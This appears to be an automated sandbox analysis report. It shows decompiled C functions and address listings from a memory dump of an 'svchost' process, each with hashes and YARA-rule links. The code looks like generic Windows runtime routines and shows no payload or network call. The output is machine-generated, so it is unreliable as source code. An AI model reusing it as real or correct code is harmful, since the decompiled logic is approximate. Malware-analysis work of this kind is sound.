                                          0x03a3ef8f
                                          0x00000000
                                          0x03a3ef91
                                          0x03a3ef93
                                          0x03a3efc4
                                          0x03a3efc4
                                          0x03a3efc4
                                          0x03a3efca
                                          0x03a3efd0
                                          0x03a3f0a6
                                          0x00000000
                                          0x00000000
                                          0x03a3f0af
                                          0x03a8bb06
                                          0x03a8bb0a
                                          0x03a3f0b5
                                          0x03a3f0b5
                                          0x03a3f0b5
                                          0x03a3f0b5
                                          0x00000000
                                          0x03a3efd6
                                          0x03a3efd9
                                          0x03a3f0de
                                          0x03a3f0e2
                                          0x03a3efdf
                                          0x03a3efdf
                                          0x03a3efdf
                                          0x03a3efe5
                                          0x03a8bafc
                                          0x03a8bafc
                                          0x03a3efe5
                                          0x03a3efeb
                                          0x03a3efed
                                          0x03a3f00f
                                          0x03a3f011
                                          0x03a3f01a
                                          0x03a3f01d
                                          0x03a3f021
                                          0x03a3f028
                                          0x03a3f029
                                          0x03a3f029
                                          0x03a3f02c
                                          0x00000000
                                          0x03a3f02c
                                          0x03a3eff3
                                          0x03a3eff9
                                          0x03a3f0ea
                                          0x03a3f0ed
                                          0x03a3f0ef
                                          0x00000000
                                          0x03a3f0ef
                                          0x03a3f003
                                          0x03a8bb12
                                          0x03a3f045
                                          0x03a3f049
                                          0x03a3f051
                                          0x03a3f09e
                                          0x03a3f0a0
                                          0x03a3f0a0
                                          0x03a3f09e
                                          0x03a3f053
                                          0x03a3f064
                                          0x03a3f064
                                          0x03a3f06b
                                          0x03a8bb1a
                                          0x03a8bb1a
                                          0x03a3f071
                                          0x03a3f071
                                          0x03a3f07d
                                          0x03a3f082
                                          0x03a3f08f
                                          0x03a3f08f
                                          0x03a3f009
                                          0x03a3f00d
                                          0x00000000
                                          0x03a3f00d
                                          0x03a3efd0
                                          0x03a3ef97
                                          0x03a3efa5
                                          0x03a3efaa
                                          0x00000000
                                          0x03a3efac
                                          0x03a3efac
                                          0x03a3efac
                                          0x00000000
                                          0x03a3efb2
                                          0x03a3f036
                                          0x03a3f03a
                                          0x03a3f040
                                          0x03a3f090
                                          0x00000000
                                          0x03a3f092
                                          0x03a3f042
                                          0x00000000
                                          0x03a3f042
                                          0x03a3efb7
                                          0x03a3efb9
                                          0x03a3efbc
                                          0x03a3efb0
                                          0x03a3efb0
                                          0x00000000
                                          0x03a3efbe
                                          0x03a3efbe
                                          0x03a3efc1
                                          0x00000000
                                          0x03a3efc1
                                          0x03a3efbc
                                          0x03a3efaa
                                          0x03a3ef91

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: 46b58abe490fec568fe8f44715c6b3760dd681b591a81425aed303f1151eddf6
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: BE51E131E04249EFDB24CB6CC194BEEFBB1AF47314F1881AEE44597281D3B5A989C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF740D Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E03AF740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E03A7D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E03A6F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E03A6F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                          0x03af740d
                                          0x03af740d
                                          0x03af7412
                                          0x03af7413
                                          0x03af7416
                                          0x03af7418
                                          0x03af741c
                                          0x03af741f
                                          0x03af7422
                                          0x03af7422
                                          0x03af7428
                                          0x03af742a
                                          0x03af742a
                                          0x03af7451
                                          0x03af7432
                                          0x03af744f
                                          0x03af744f
                                          0x00000000
                                          0x03af7434
                                          0x03af7438
                                          0x03af7443
                                          0x03af7517
                                          0x03af7517
                                          0x03af751a
                                          0x03af7535
                                          0x03af7520
                                          0x03af7527
                                          0x03af752c
                                          0x03af7531
                                          0x03af7533
                                          0x00000000
                                          0x03af7533
                                          0x00000000
                                          0x03af7531
                                          0x03af754b
                                          0x03af754f
                                          0x03af755c
                                          0x03af755c
                                          0x03af755f
                                          0x03af7560
                                          0x03af7561
                                          0x03af7562
                                          0x03af7563
                                          0x03af7568
                                          0x03af756a
                                          0x03af756c
                                          0x03af756d
                                          0x03af756d
                                          0x03af756f
                                          0x03af7572
                                          0x03af7574
                                          0x03af7577
                                          0x03af757c
                                          0x03af757f
                                          0x00000000
                                          0x03af7551
                                          0x03af7551
                                          0x03af7551
                                          0x03af7553
                                          0x03af7553
                                          0x03af7449
                                          0x03af7449
                                          0x03af744c
                                          0x03af744c
                                          0x00000000
                                          0x03af744c
                                          0x03af7443
                                          0x03af750e
                                          0x03af7514
                                          0x03af7514
                                          0x03af7455
                                          0x03af7469
                                          0x03af746d
                                          0x00000000
                                          0x03af7473
                                          0x03af7473
                                          0x03af7476
                                          0x03af7480
                                          0x03af7484
                                          0x03af748e
                                          0x03af7493
                                          0x03af7493
                                          0x03af7496
                                          0x03af7499
                                          0x03af74a1
                                          0x03af74b1
                                          0x03af74b5
                                          0x00000000
                                          0x03af74bb
                                          0x03af74c1
                                          0x03af74c1
                                          0x03af74c4
                                          0x03af74c5
                                          0x03af74c6
                                          0x03af74c7
                                          0x03af74c8
                                          0x03af74cd
                                          0x00000000
                                          0x03af74d3
                                          0x03af74d3
                                          0x03af74d6
                                          0x03af74d8
                                          0x03af74db
                                          0x03af74dd
                                          0x03af74e0
                                          0x03af74e7
                                          0x03af74ee
                                          0x03af74ee
                                          0x03af74f4
                                          0x03af74f9
                                          0x00000000
                                          0x03af74fb
                                          0x03af74fb
                                          0x03af74fd
                                          0x03af7500
                                          0x03af7503
                                          0x03af7505
                                          0x03af7505
                                          0x03af74f9
                                          0x00000000
                                          0x03af74cd
                                          0x03af74b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: bffcd9b8616bff45820cf16da8a6653c3ba2e085b2ba7eb1b89b9629caef8284
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: B2519E71600606EFCB15CF54D980A66FBB9FF45344F18C0AAEA089F252E772E946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A52990 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E03A52990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x3afff00);
				E03A7D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3a01664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E03A6E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3a01668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E03AA51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x3a0166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03A52AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03A36600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03A52C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E03A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03A52AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03A52C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03A52ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E03A7D0D1(_t62);
				goto L28;
			}





















                                          0x03a52990
                                          0x03a52992
                                          0x03a52997
                                          0x03a529a3
                                          0x03a529a6
                                          0x03a529ab
                                          0x03a529ad
                                          0x03a529b2
                                          0x03a95c80
                                          0x03a529b8
                                          0x03a529b8
                                          0x03a529bb
                                          0x03a529c0
                                          0x03a529c5
                                          0x03a529c6
                                          0x03a529c6
                                          0x03a529cb
                                          0x00000000
                                          0x00000000
                                          0x03a529cd
                                          0x03a529d0
                                          0x03a529d9
                                          0x03a529db
                                          0x03a529dd
                                          0x03a52a7f
                                          0x03a52a84
                                          0x03a52a87
                                          0x03a52a89
                                          0x03a95ca1
                                          0x03a95ca3
                                          0x00000000
                                          0x03a52a8f
                                          0x03a52a8f
                                          0x00000000
                                          0x03a52a8f
                                          0x00000000
                                          0x03a529e3
                                          0x03a529e3
                                          0x03a529e3
                                          0x00000000
                                          0x03a529e3
                                          0x03a529dd
                                          0x00000000
                                          0x03a529db
                                          0x03a529e6
                                          0x03a529e9
                                          0x03a529eb
                                          0x03a529ed
                                          0x03a529f3
                                          0x03a529f5
                                          0x03a529f8
                                          0x03a529fa
                                          0x03a52a97
                                          0x03a52a9a
                                          0x03a52a9d
                                          0x03a52add
                                          0x00000000
                                          0x03a52a9f
                                          0x03a52aa2
                                          0x03a52aa5
                                          0x03a52aa8
                                          0x03a52aab
                                          0x03a95cab
                                          0x03a95caf
                                          0x03a95cc5
                                          0x03a95cda
                                          0x03a95cdc
                                          0x03a95cdf
                                          0x03a95ce5
                                          0x00000000
                                          0x03a95ceb
                                          0x03a95ced
                                          0x03a95cee
                                          0x00000000
                                          0x03a95cee
                                          0x03a95cb1
                                          0x03a95cb4
                                          0x03a95cb9
                                          0x03a95cbb
                                          0x00000000
                                          0x03a95cbd
                                          0x03a95cbd
                                          0x00000000
                                          0x03a95cbd
                                          0x03a95cbb
                                          0x03a52ab1
                                          0x03a52ab1
                                          0x03a52ac4
                                          0x03a52ac6
                                          0x03a52ac6
                                          0x00000000
                                          0x03a52ac6
                                          0x03a52aab
                                          0x00000000
                                          0x03a52a00
                                          0x03a52a09
                                          0x03a52a0e
                                          0x03a52a21
                                          0x03a52a24
                                          0x03a52a35
                                          0x03a52a3a
                                          0x03a52a3d
                                          0x03a52a42
                                          0x03a52a59
                                          0x03a52a59
                                          0x03a52a5c
                                          0x03a52a5f
                                          0x03a52a5f
                                          0x03a529fa
                                          0x03a529f3
                                          0x03a52a64
                                          0x03a52a64
                                          0x03a52a6b
                                          0x03a52a6b
                                          0x03a52a6d
                                          0x03a52a72
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4ccf26456ec608f867842cfa0e01f2b118e2f473c8192717ccdc0696abeb912
                                          • Instruction ID: 0b1fd04739fcb60496d02e22e2e8048ea90102227bcc2a60df8467d2e4bce23a
                                          • Opcode Fuzzy Hash: d4ccf26456ec608f867842cfa0e01f2b118e2f473c8192717ccdc0696abeb912
                                          • Instruction Fuzzy Hash: 06514575A00209EFDF25DF55C980ADEBBB5BF48310F18845AFD15AB320C3359952CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A54BAD Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E03A54BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x3b1d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E03A2CC50(_t86);
					L11:
					return E03A6B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3b18504
				E03A42280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E03A6FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E03A6B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03A44620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E03A2CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3b18504
								E03A3FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03A54F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                          0x03a54bad
                                          0x03a54bbf
                                          0x03a54bc2
                                          0x03a54bc6
                                          0x03a54bcd
                                          0x03a54bd9
                                          0x03a967fe
                                          0x03a96800
                                          0x03a54ccc
                                          0x03a54ccd
                                          0x03a54cb7
                                          0x03a54cc9
                                          0x03a54cc9
                                          0x03a54bdf
                                          0x03a54be5
                                          0x00000000
                                          0x00000000
                                          0x03a54beb
                                          0x03a54bef
                                          0x00000000
                                          0x00000000
                                          0x03a54bf5
                                          0x03a54bf9
                                          0x03a54c06
                                          0x03a54c0b
                                          0x03a54c17
                                          0x03a54c1c
                                          0x03a54c1f
                                          0x03a54c25
                                          0x03a54c33
                                          0x03a54c3d
                                          0x03a54c40
                                          0x03a54c43
                                          0x03a54c47
                                          0x03a54c4d
                                          0x03a54c53
                                          0x03a54c54
                                          0x03a54c55
                                          0x03a54c56
                                          0x03a54c5b
                                          0x03a54c5c
                                          0x03a54c63
                                          0x03a54c6b
                                          0x00000000
                                          0x00000000
                                          0x03a96776
                                          0x03a96784
                                          0x03a96784
                                          0x03a9679f
                                          0x03a967a7
                                          0x03a967af
                                          0x03a967ce
                                          0x00000000
                                          0x03a967b1
                                          0x03a967b7
                                          0x03a967b8
                                          0x03a967c1
                                          0x03a967d3
                                          0x03a967d9
                                          0x03a967dd
                                          0x03a54c94
                                          0x03a54c94
                                          0x03a54c98
                                          0x03a54c9c
                                          0x03a54ca3
                                          0x03a967f4
                                          0x03a967f4
                                          0x03a54cb5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a54cb5
                                          0x03a54c79
                                          0x03a54c7e
                                          0x03a54c89
                                          0x03a54c8b
                                          0x03a54c8f
                                          0x03a54c8f
                                          0x00000000
                                          0x03a54c89
                                          0x03a967c3
                                          0x00000000
                                          0x03a967c3
                                          0x03a967af
                                          0x03a54c73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc9fd9a32c25ca1bbf607181b31102cf2ec62cee7665d8e371c008c0832bbdb2
                                          • Instruction ID: 4f6175e063220163ea593e5eb8ca7673e00a18838d38a94bf478b255668fb053
                                          • Opcode Fuzzy Hash: dc9fd9a32c25ca1bbf607181b31102cf2ec62cee7665d8e371c008c0832bbdb2
                                          • Instruction Fuzzy Hash: 8A418735A002289BDF21DF65CD44BEAB7B8AF49710F4504ABE908AB351D7749E84CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A54D3B Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E03A54D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x3b1d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E03A6FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3b17bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E03A6B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03A44620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E03A2CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E03A6B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E03A6F380(_t67 + 0xc, 0x3a05138, 0x10) == 0) {
								 *0x3b160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03A54F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03A54E70(0x3b186b0, 0x3a55690, 0, 0) != 0) {
					_t46 = E03A2CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                          0x03a54d3b
                                          0x03a54d4d
                                          0x03a54d53
                                          0x03a54d58
                                          0x03a54d65
                                          0x03a54d6c
                                          0x03a54d71
                                          0x03a54d77
                                          0x03a54d7f
                                          0x03a54d8c
                                          0x03a54d8e
                                          0x03a54dad
                                          0x03a54db0
                                          0x03a54db7
                                          0x03a54db8
                                          0x03a54db9
                                          0x03a54dba
                                          0x03a54dbb
                                          0x03a54dc1
                                          0x03a54dc8
                                          0x03a54dcc
                                          0x03a54dd5
                                          0x03a54dde
                                          0x03a54ddf
                                          0x03a54de0
                                          0x03a54de1
                                          0x03a54de6
                                          0x03a54de7
                                          0x03a54de9
                                          0x03a54df3
                                          0x00000000
                                          0x00000000
                                          0x03a96c7c
                                          0x03a96c8a
                                          0x03a96c8a
                                          0x03a96c9d
                                          0x03a96ca7
                                          0x03a96cac
                                          0x03a96cb2
                                          0x03a96cb9
                                          0x00000000
                                          0x03a96cbf
                                          0x03a96cbf
                                          0x00000000
                                          0x03a96cbf
                                          0x03a96cb9
                                          0x03a54dfb
                                          0x03a96ccf
                                          0x03a96cd3
                                          0x03a54e32
                                          0x03a54e39
                                          0x03a96ce0
                                          0x03a96cf2
                                          0x03a96cf2
                                          0x03a96ce0
                                          0x03a54e3f
                                          0x03a54e41
                                          0x03a54e51
                                          0x03a54e51
                                          0x03a54e03
                                          0x03a54e03
                                          0x03a54e09
                                          0x03a54e0f
